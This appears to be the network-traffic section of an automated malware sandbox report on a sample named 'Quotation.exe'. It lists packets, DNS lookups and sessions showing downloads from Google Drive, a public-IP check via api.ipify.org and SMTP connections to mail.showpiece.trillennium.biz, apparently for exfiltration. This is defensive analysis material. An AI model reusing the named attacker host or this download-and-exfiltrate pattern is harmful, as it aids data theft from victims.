                                                              Nov 4, 2024 10:00:32.023968935 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.024039984 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.024092913 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.024099112 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.024152994 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.027395964 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.027445078 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.027669907 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.027714968 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.027718067 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.027759075 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.027766943 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.027808905 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.027812004 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.027849913 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.034226894 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.034287930 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.034365892 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.034414053 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.040898085 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.040947914 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.041027069 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.041071892 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.041337967 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.041378975 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.041409969 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.041449070 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.041632891 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.041676044 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.142045021 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.142154932 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.142184019 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.142234087 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.145200014 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.145246983 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.145334005 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.145380020 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.145544052 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.145586967 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.145745993 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.145787001 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.152112007 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.152204037 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.152254105 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.152293921 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.158723116 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.158885002 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.158889055 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.158934116 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.159017086 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.159064054 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.159084082 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.159130096 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.159387112 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.159429073 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.259723902 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.259785891 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.259792089 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.259829998 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.259838104 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.259872913 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.265758991 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.265819073 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.265822887 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.265862942 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.265866041 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.265908957 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.265923023 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.265966892 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.270529985 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.270581961 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.270694971 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.270750999 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.276480913 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.276539087 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.276626110 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.276667118 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.276678085 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.276726007 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.276913881 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.276962042 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.321527004 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.321630001 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.321635962 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.321683884 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.377582073 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.377652884 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.377659082 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.377698898 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.380940914 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.381004095 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.381088972 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.381134987 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.387598038 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.387687922 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.387717009 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.387758017 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.388370037 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.388415098 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.394298077 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.394359112 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.394439936 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.394484997 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.394613028 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.394659042 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.394809961 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.394860029 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.394890070 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.394931078 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.394934893 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.394978046 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.395072937 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.395108938 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.438617945 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.438673019 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.438677073 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.438715935 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.495919943 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.495973110 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.496010065 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.496052980 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.498656034 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.498708963 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.498768091 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.498809099 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.505330086 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.505387068 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.505390882 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.505434990 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.512288094 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.512368917 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.512427092 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.512471914 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.512588024 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.512628078 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.512634993 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.512676954 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.512856960 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.512900114 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.513020992 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.513060093 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.561594009 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.561686039 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.561711073 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.561750889 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.561758995 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.561800003 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.562007904 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.562058926 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.613471985 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.613526106 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.613533020 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.613567114 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.613579035 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.613617897 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.616662025 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.616816044 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.616821051 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.616867065 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.623378038 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.623450994 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.623455048 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.623495102 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.630013943 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.630079985 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.630136013 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.630177021 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.630181074 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.630222082 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.630439043 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.630487919 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.630569935 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.630618095 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.630745888 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.630795002 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.679501057 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.679553032 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.679591894 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.679627895 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.679632902 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.679672956 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.679920912 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.679965973 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.732541084 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.732631922 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.732639074 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.732678890 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.735444069 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.735492945 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.735553026 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.735598087 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.741595984 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.741642952 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.741739035 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.741785049 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.749022961 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.749147892 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.749182940 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.749222994 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.749227047 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.749260902 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.749423981 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.749466896 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.749605894 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.749651909 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.749810934 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.749852896 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.749856949 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.749898911 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.797509909 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.797763109 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.797768116 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.797832012 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.797866106 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.797907114 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.797920942 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.797965050 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.850083113 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.850147963 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.850178957 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.850222111 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.853262901 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.853435993 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.853441000 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.853532076 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.859366894 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.859451056 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.859484911 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.859555960 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.859560013 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.859586000 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.859592915 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.859600067 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:32.859606981 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.859668016 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:33.328067064 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:33.328094006 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:33.328170061 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:33.331073046 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:33.331085920 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:33.943159103 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:33.943250895 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:33.944834948 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:33.944848061 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:33.945152998 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:33.950685024 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:33.995336056 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:34.125526905 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:34.125637054 CET44349802104.26.13.205192.168.2.5
                                                              Nov 4, 2024 10:00:34.125695944 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:34.131138086 CET49802443192.168.2.5104.26.13.205
                                                              Nov 4, 2024 10:00:35.791871071 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:35.798650980 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:35.798760891 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:36.501033068 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:36.501220942 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:36.506201982 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.581612110 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.581650972 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.581680059 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.581744909 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.581854105 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.581854105 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.582514048 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.582608938 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.587863922 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.739248991 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.739610910 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.744510889 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.908931017 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.908957005 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.909049034 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.909889936 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.909970999 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.910020113 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.910162926 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:37.925327063 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:37.930217981 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.078052044 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.080600023 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:38.085453987 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.235836983 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.236675978 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:38.241573095 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.390033960 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.390918016 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:38.395812988 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.558218002 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.558578014 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:38.563425064 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.846560001 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:38.846755981 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:38.851536036 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.029341936 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.029984951 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:39.034840107 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.182426929 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.183120966 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:39.183182001 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:39.183212042 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:39.183242083 CET49815587192.168.2.567.23.226.139
                                                              Nov 4, 2024 10:00:39.188002110 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.188043118 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.188133955 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.188138008 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.354703903 CET5874981567.23.226.139192.168.2.5
                                                              Nov 4, 2024 10:00:39.410228968 CET49815587192.168.2.567.23.226.139
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 4, 2024 10:00:26.771666050 CET5981353192.168.2.51.1.1.1
                                                              Nov 4, 2024 10:00:26.778480053 CET53598131.1.1.1192.168.2.5
                                                              Nov 4, 2024 10:00:28.282558918 CET5835553192.168.2.51.1.1.1
                                                              Nov 4, 2024 10:00:28.290019989 CET53583551.1.1.1192.168.2.5
                                                              Nov 4, 2024 10:00:33.318192959 CET5672053192.168.2.51.1.1.1
                                                              Nov 4, 2024 10:00:33.325041056 CET53567201.1.1.1192.168.2.5
                                                              Nov 4, 2024 10:00:35.161303043 CET5276953192.168.2.51.1.1.1
                                                              Nov 4, 2024 10:00:35.790688038 CET53527691.1.1.1192.168.2.5
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 4, 2024 10:00:26.771666050 CET192.168.2.51.1.1.10xee1aStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:28.282558918 CET192.168.2.51.1.1.10x12f3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:33.318192959 CET192.168.2.51.1.1.10xd6a3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:35.161303043 CET192.168.2.51.1.1.10x1ce7Standard query (0)mail.showpiece.trillennium.bizA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 4, 2024 10:00:26.778480053 CET1.1.1.1192.168.2.50xee1aNo error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:28.290019989 CET1.1.1.1192.168.2.50x12f3No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:33.325041056 CET1.1.1.1192.168.2.50xd6a3No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:33.325041056 CET1.1.1.1192.168.2.50xd6a3No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:33.325041056 CET1.1.1.1192.168.2.50xd6a3No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                              Nov 4, 2024 10:00:35.790688038 CET1.1.1.1192.168.2.50x1ce7No error (0)mail.showpiece.trillennium.bizshowpiece.trillennium.bizCNAME (Canonical name)IN (0x0001)false
                                                              Nov 4, 2024 10:00:35.790688038 CET1.1.1.1192.168.2.50x1ce7No error (0)showpiece.trillennium.biz67.23.226.139A (IP address)IN (0x0001)false
                                                              • drive.google.com
                                                              • drive.usercontent.google.com
                                                              • api.ipify.org
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549767142.250.186.1744432284C:\Users\user\Desktop\Quotation.exe
                                                              TimestampBytes transferredDirectionData
